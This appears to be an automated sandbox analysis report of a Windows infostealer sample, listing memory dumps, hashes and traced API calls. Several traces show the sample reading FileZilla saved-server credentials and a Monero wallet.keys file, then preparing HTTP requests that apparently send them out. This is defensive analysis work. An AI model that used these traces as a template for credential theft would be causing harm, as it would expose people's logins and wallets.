                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !n<
                      • API String ID: 0-316657515
                      • Opcode ID: 1f51fe905ede595f128ad47dac692242eb27463f98b8b10d5f178e2e2e68951e
                      • Instruction ID: 5a80eda241ee866854b1dcf464dc95ba5be619563f5259ca7a990eca4c918e4a
                      • Opcode Fuzzy Hash: 1f51fe905ede595f128ad47dac692242eb27463f98b8b10d5f178e2e2e68951e
                      • Instruction Fuzzy Hash: 1FB217F3A0C214AFE3046E29EC8567AFBE9EF94720F16493DE6C487744EA3558018797
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: miw$qk_w
                      • API String ID: 0-820712377
                      • Opcode ID: 70da61bfdfa7961664a31f7fd4d86149e420411c1c22f1737f417db121a9c694
                      • Instruction ID: d0d0207d64f125a7cf374cb49230ccb298692bda1648d09719fe19b2c9fb824c
                      • Opcode Fuzzy Hash: 70da61bfdfa7961664a31f7fd4d86149e420411c1c22f1737f417db121a9c694
                      • Instruction Fuzzy Hash: 2F41F2B280C214DFD3106F599E812BAB7D8EB54370F264D3DDE9997600E63A5840DBC6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: B[
                      • API String ID: 0-2151967909
                      • Opcode ID: 8f56fb069846e37ac9372cf133ad4e4f6ff9c71d4dc74b12eab6cc305ae53553
                      • Instruction ID: 12e3c843abec4719b8da93749b10190453ec9184cd76bd9f7187466fcf4bae07
                      • Opcode Fuzzy Hash: 8f56fb069846e37ac9372cf133ad4e4f6ff9c71d4dc74b12eab6cc305ae53553
                      • Instruction Fuzzy Hash: 2C5114B291E224DFD3007E18AD4527BBBE5AB50710F264C2DDAC697648EE39980497C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !o~
                      • API String ID: 0-3231249185
                      • Opcode ID: 1010419807777490aff652da995edb140dda79a6970b8aac9b99cfdbef9e8874
                      • Instruction ID: 885036a4a217ed2fad50e465748c2bd71a0a656b2a292631cb5ac8c9e2242985
                      • Opcode Fuzzy Hash: 1010419807777490aff652da995edb140dda79a6970b8aac9b99cfdbef9e8874
                      • Instruction Fuzzy Hash: 9551F3F3A082145BE340AE69DC857A6B7D8DF64321F1F043EEA84D7780E679AC4587D2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6210e74bef3a057591b9e9f0e27233bf7dbb38ac0db23044629f57cd2c500e44
                      • Instruction ID: 8698bb78651dc1313550fbb337d271aa5aa256260bc8bc929cc55b86d4f4de1b
                      • Opcode Fuzzy Hash: 6210e74bef3a057591b9e9f0e27233bf7dbb38ac0db23044629f57cd2c500e44
                      • Instruction Fuzzy Hash: 915138F3A142044BF3149E29DC9477AB7D6DBD4320F2B863DDAC8C7380E93988168296
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8fd1936a50de725f4f3f01fa8abed13dab9685675b2e289e2682fa704abb59f6
                      • Instruction ID: 518ec1309f789a7193e597bc110852e25af6e372a70ff2d709c6181480eeb21a
                      • Opcode Fuzzy Hash: 8fd1936a50de725f4f3f01fa8abed13dab9685675b2e289e2682fa704abb59f6
                      • Instruction Fuzzy Hash: 3541D2F3A182105FF354997CEC89727B6D6DB84324F26863DDB98D77C8E97948048286
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d82d58ef7a3c7e9137191ff6c2f6e87a5334df5c703b0f207c791ebbe654d34
                      • Instruction ID: 9155905f39ecd2d5da784064e861bf1e214400c1ce2445cc9729dce8d3dff6d6
                      • Opcode Fuzzy Hash: 2d82d58ef7a3c7e9137191ff6c2f6e87a5334df5c703b0f207c791ebbe654d34
                      • Instruction Fuzzy Hash: 9531E35A05D7E28FC3138B382CB96D27FA06D132243998AEFC4C54F987E256941AC3D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                        • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                        • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                        • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                        • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                        • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                        • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00560DBA,00560DB7,00560DB6,00560DB3), ref: 00550362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00550369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00550385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 005503CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 005503DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00550419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00550463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00550562
                      • lstrcat.KERNEL32(?,profile: null), ref: 00550571
                      • lstrcat.KERNEL32(?,url: ), ref: 00550580
                      • lstrcat.KERNEL32(?,00000000), ref: 00550593
                      • lstrcat.KERNEL32(?,00561678), ref: 005505A2
                      • lstrcat.KERNEL32(?,00000000), ref: 005505B5
                      • lstrcat.KERNEL32(?,0056167C), ref: 005505C4
                      • lstrcat.KERNEL32(?,login: ), ref: 005505D3
                      • lstrcat.KERNEL32(?,00000000), ref: 005505E6
                      • lstrcat.KERNEL32(?,00561688), ref: 005505F5
                      • lstrcat.KERNEL32(?,password: ), ref: 00550604
                      • lstrcat.KERNEL32(?,00000000), ref: 00550617
                      • lstrcat.KERNEL32(?,00561698), ref: 00550626
                      • lstrcat.KERNEL32(?,0056169C), ref: 00550635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: ee2519b335a04e0b6a811b7e58a98fcefcf3764309a048c0365b3333347f36aa
                      • Instruction ID: e29c9a3873239849eef93dc7880719ba82b00414a30ff522d6a38a78035134d1
                      • Opcode Fuzzy Hash: ee2519b335a04e0b6a811b7e58a98fcefcf3764309a048c0365b3333347f36aa
                      • Instruction Fuzzy Hash: 79D14271900109ABDB04EBF0DDAAEEE7B38FF54301F54851AF502A7091EF34AA49CB65
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                        • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005459F8
                      • StrCmpCA.SHLWAPI(?,0102FC80), ref: 00545A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00545B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0102FCE0,00000000,?,0102E8C0,00000000,?,00561A1C), ref: 00545E71
                      • lstrlen.KERNEL32(00000000), ref: 00545E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00545E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00545E9A
                      • lstrlen.KERNEL32(00000000), ref: 00545EAF
                      • lstrlen.KERNEL32(00000000), ref: 00545ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00545EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 00545F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00545F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00545F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00545FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00545FBD
                      • HttpOpenRequestA.WININET(00000000,0102FC40,?,0102F320,00000000,00000000,00400100,00000000), ref: 00545BF8
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • InternetCloseHandle.WININET(00000000), ref: 00545FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 874700897-2180234286
                      • Opcode ID: 97f92194595b95b418bcfb8e69e589836811c0ef5423fffe0cb828fac3a750a5
                      • Instruction ID: 8ad5a94d018e408df316efedd909fa5e958029e50f61bca5fc188f89622436cf
                      • Opcode Fuzzy Hash: 97f92194595b95b418bcfb8e69e589836811c0ef5423fffe0cb828fac3a750a5
                      • Instruction Fuzzy Hash: E3122172820119ABDB15EBA0DCA9FEE7778BF54701F50429AB50663091EF303A4DCF65
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0102EBC0,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
